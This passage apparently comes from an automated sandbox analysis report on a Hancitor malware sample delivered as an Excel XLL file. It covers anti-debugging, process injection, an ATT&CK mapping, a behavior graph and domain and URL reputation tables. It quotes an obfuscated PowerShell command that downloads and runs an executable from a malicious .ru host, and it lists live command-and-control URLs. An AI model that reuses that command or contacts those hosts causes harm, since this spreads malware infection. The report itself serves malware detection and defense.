        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpBinary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657943 IsDebuggerPresent,16_2_00657943
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,16_2_00613560
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h]16_2_0064C285
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h]16_2_00659D43
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h]16_2_00659DC9
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h]16_2_00659D86
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h]16_2_00659E24
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h]16_2_00659ED9
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h]16_2_00659F61
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h]16_2_00659F1D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h]16_2_00659F92
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]16_2_006B17C3
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h]16_2_006B17C3
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006B138F push dword ptr fs:[00000030h]16_2_006B138F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap,16_2_00611390
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BAF2 SetUnhandledExceptionFilter,16_2_0062BAF2
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0062B4CC
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0062B95F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00636D21

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Contains functionality to inject threads in other processesShow sources
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,16_2_00613860
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe' Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'Jump to behavior
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BBFB cpuid 16_2_0062BBFB
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,16_2_0065C067
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,16_2_0065C0D0
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,16_2_0065C16B
        Source: C:\Users\Public\snd32sys.exeCode function: ___crtGetLocaleInfoEx,16_2_0062A104
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_0065C1F6
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,16_2_0065C449
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,16_2_00651499
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_0065C56F
        Source: C:\Users\Public\snd32sys.exeCode function: EnumSystemLocalesW,16_2_00651599
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,16_2_0065C675
        Source: C:\Users\Public\snd32sys.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_0065C744
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,16_2_0062A79B
        Source: C:\Users\Public\snd32sys.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,16_2_0065BDC5
        Source: C:\Users\Public\snd32sys.exeCode function: GetLocaleInfoW,16_2_00651EBC
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Users\Public\snd32sys.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_0062B84D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free,16_2_00657096
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA,16_2_00611A80

        Remote Access Functionality:

        barindex
        Yara detected HancitorShow sources
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Software Packing11Security Account ManagerSystem Information Discovery36SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion21LSA SecretsSecurity Software Discovery21SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 445958 Sample: 0708_5355150121.xll Startdate: 08/07/2021 Architecture: WINDOWS Score: 100 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 8 other signatures 2->48 8 EXCEL.EXE 25 11 2->8         started        process3 dnsIp4 40 srand04rf.ru 8.211.241.0, 49724, 49748, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 8->40 28 C:\Users\Public\res32.hta, HTML 8->28 dropped 12 mshta.exe 19 8->12         started        file5 process6 process7 14 powershell.exe 14 12->14         started        signatures8 56 Drops PE files to the user root directory 14->56 58 Powershell drops PE file 14->58 17 snd32sys.exe 12 14->17         started        21 powershell.exe 15 17 14->21         started        24 conhost.exe 14->24         started        process9 dnsIp10 30 sudepallon.com 77.222.42.67, 49757, 49758, 49759 SWEB-ASRU Russian Federation 17->30 32 elb097307-934924932.us-east-1.elb.amazonaws.com 23.21.173.155, 49756, 80 AMAZON-AESUS United States 17->32 38 2 other IPs or domains 17->38 50 Detected unpacking (overwrites its own PE header) 17->50 52 May check the online IP address of the machine 17->52 54 Contains functionality to inject threads in other processes 17->54 34 srand04rf.ru 21->34 36 192.168.2.1 unknown unknown 21->36 26 C:\Users\Public\snd32sys.exe, PE32 21->26 dropped file11 signatures12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        0708_5355150121.xll24%VirustotalBrowse
        0708_5355150121.xll17%ReversingLabsWin32.Trojan.Babar

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        16.2.snd32sys.exe.610000.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%Avira URL Cloudsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
        http://srand04rf.ru/080%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        http://thentabecon.ru/8/forum.php0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        http://anspossthrly.ru/8/forum.php0%Avira URL Cloudsafe
        http://srand04rf.ru0%Avira URL Cloudsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png80%Avira URL Cloudsafe
        http://srand04rf.ru/08.jpg0%Avira URL Cloudsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        elb097307-934924932.us-east-1.elb.amazonaws.com
        		23.21.173.155
        		truefalse
          		high
          srand04rf.ru
          		8.211.241.0
          		truetrue
            		unknown
            sudepallon.com
            		77.222.42.67
            		truetrue
